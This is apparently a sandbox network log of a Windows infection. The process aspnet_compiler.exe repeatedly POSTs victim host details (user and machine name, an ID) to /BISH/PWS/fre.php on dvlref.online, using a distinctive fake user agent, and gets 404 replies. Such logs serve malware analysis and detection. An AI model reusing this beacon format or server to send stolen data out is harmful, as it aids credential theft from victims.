Dec 2, 2024 14:46:27.824605942 CET	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk830021FRONTDESK-PCk0FDD42EE188E931437F4FBE2CeSoDS
Dec 2, 2024 14:46:29.253849030 CET	791	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lB9J6s8SQ9jwJB6KPE7WaRiqvJVgyap28y1%2F0ZZatlRSTjKU%2B%2BYrjrWv5V0vXtNoAF7d9JICm0OBWM1UMrQkFur5GrGB1CvnQM0x%2FlVoN%2FNWI77GvYSjuFU6tm0iRSrZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc36a2a1742ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=434&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49709	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:29.652689934 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 192 Connection: close
Dec 2, 2024 14:46:29.772994041 CET	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk830021FRONTDESK-PC+0FDD42EE188E931437F4FBE2CHljTR
Dec 2, 2024 14:46:31.063796043 CET	787	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQhyCcmUTN%2Fd%2BP25HGlU4QVQSV%2Fqgi5fJSJPjd6uOLs6B1favhkAPWDlxhzcabtKk0bp2oWWFfwSdRU3kjAESicg7Qohk91jiLA0TCajJUhKh1hqmn9Iy5t5X9gXWCcq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc375a8c81879-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1660&rtt_var=830&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=434&delivery_rate=0&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49710	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:31.245263100 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:31.365226030 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:32.727952003 CET	797	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2eatgvcaiUJZC7cOta5y1d3j7y6zVNENhECDO19IPxZ8Np1EOfBHy2X2nyEuxC44LxCU8P9%2FcRIJBRAlraWDUvmZFoOoxGZeGib%2F8DpfL6T%2FUu6znaCKKiBQW52n%2BARa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc37f7f1d7c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1819&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49716	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:32.990618944 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:33.110693932 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:34.432985067 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1z%2FmD23GnYoTnQmuXMnVNYoecc8kP0SjWKTE8%2FjZvU3ByNqR5R6NiItkp9jH%2F8tXEGY6XZM6p8AAm4DnHSYMp4VrrENnCAV7swJ19V%2B5JJghE5fuxX9AFhmQB%2F%2FvUVhi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc38a982a41a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1685&rtt_var=842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49722	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:34.717534065 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:34.837852955 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:36.427772999 CET	801	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyEJvmVufewW22JEVfFA%2Fqb%2BQgjlWL5MJyLxOiY9OBakJMTPwqKRbyAeJK3Xae1lyH1keg%2Bo%2FOUHTpfT1Wxz%2BOV21k%2FhqOGzlUJLdURthcBInB9XfM1aMbVuWlPDGHyw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3951d883338-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1815&rtt_var=907&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49723	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:36.776074886 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:36.896166086 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:38.218028069 CET	798	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKL2ITkofRYSfXMDuYwSpHl0NDjyGYQntytZSN94GNloBwZ2KBvx3bnyLURnQ8%2BqoZ22g9vHFweajYZ8mSQZYOW7fUE24%2FbVUW05zwjNK%2Fv1iWnZQs%2FmLw4rzxt12Yd1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3a1e82743ec-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2453&min_rtt=2453&rtt_var=1226&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49730	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:38.495258093 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:38.615372896 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:39.876501083 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KOshBIpuOpiFyJrYI0GBNEN4drZABeojpF7aNqd8P45jzHipPNsCprZR%2F%2F%2Fx92uAMSajeK7myc6O69MqMSOzt39gIsGxq33oEtX6lwB6elly0MORhtxIq92Edxy8XwYf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3ac999a5e6b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1682&rtt_var=841&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49737	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:40.147806883 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:40.267793894 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:41.558192968 CET	800	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kf%2B7qSiTZnzGoqv70sN4r4KaHmEpTNc2ovxUPxB5hYAoOnT7lsRk7RVr9B1QIe0Nq0Q3Wm0U4IGtJxO18dXVIJ9gb1Zl3C5pVfQ2fKmzmJZ8r%2F%2FIe%2BVxIoE3%2BRF7UDeX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3b6fd68de92-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2611&min_rtt=2611&rtt_var=1305&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49745	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:41.817569017 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:41.937967062 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:43.173526049 CET	800	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEX50%2B1GB7zdkSizpFC8SgVd4FYNBu2dmRJ%2BgE1x%2BIx4gWTqSkq8d%2FOU2izgWS0DFByXxGqPOeQcB3o7pFxw0%2BWvtcgusK47Oe8dOmEAo3%2F3sbq2wJB9IgyypJ385VBj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3c15909ef9d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=97&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49746	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:43.443485022 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:43.563585997 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:44.864051104 CET	793	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDLhj9ltAbdSkCyaYajXwU63DUUGWGdVaYvdJjk8%2BmQXaaJnTzp83oac1niVtKY13qa6LsGlekGyafhwaPRdDiZB%2FrnDmleX1oTTzVhU8SqsGBxPYtjgpnbrvzkHVVFW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3cb9ae14401-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1770&rtt_var=885&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49752	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:45.194531918 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:45.314614058 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:46.621887922 CET	795	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bJBu3t00vSHa6yqPTeXNS3kJoEkndnqN1I1DvB1Pc1HpxBaYPP%2FMRNNv60T7URuEF9vixl6j8Yu9gd2uz9%2BEGwG%2Byg0XVmych1xcX4VIWzfQskfKxQFwu4tkCLp9Wlp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3d63c6d439d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49758	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:46.881537914 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:47.001554966 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:48.318416119 CET	796	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5VqL3UN%2Fpkb571Aqx0sVVT3T2mwwz17aAefxVQ%2Bld3q0cDS7wz97eR%2B5vJkemYTQ8rfJzwBrLdFYh9zYUlGp867nvu9CFXGyjmftEVjlaoTKwPw9l8neG7KgJPcrrk8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3e11b1c42d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2357&min_rtt=2357&rtt_var=1178&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49764	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:48.589751005 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:48.710340977 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Dec 2, 2024 14:46:49.963701010 CET	799	IN	HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:46:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=liVCNVQMbv7jEVNXVPbUxVYQGOedYjTLISy2p317m6ATogRRx8%2Fn2tJrQsYttj3A6tOtytNRM9QaorUSdFO54rFr%2Ft%2BsnQResQdmA%2BxpgdS5kPMZZZZ%2FvDvvZcIDITWx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbc3eb89c042a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49765	104.21.57.140	80	1648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 14:46:50.227560043 CET	242	OUT	POST /BISH/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dvlref.online Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D2101A5E Content-Length: 165 Connection: close
Dec 2, 2024 14:46:50.347634077 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk830021FRONTDESK-PC0FDD42EE188E931437F4FBE2C
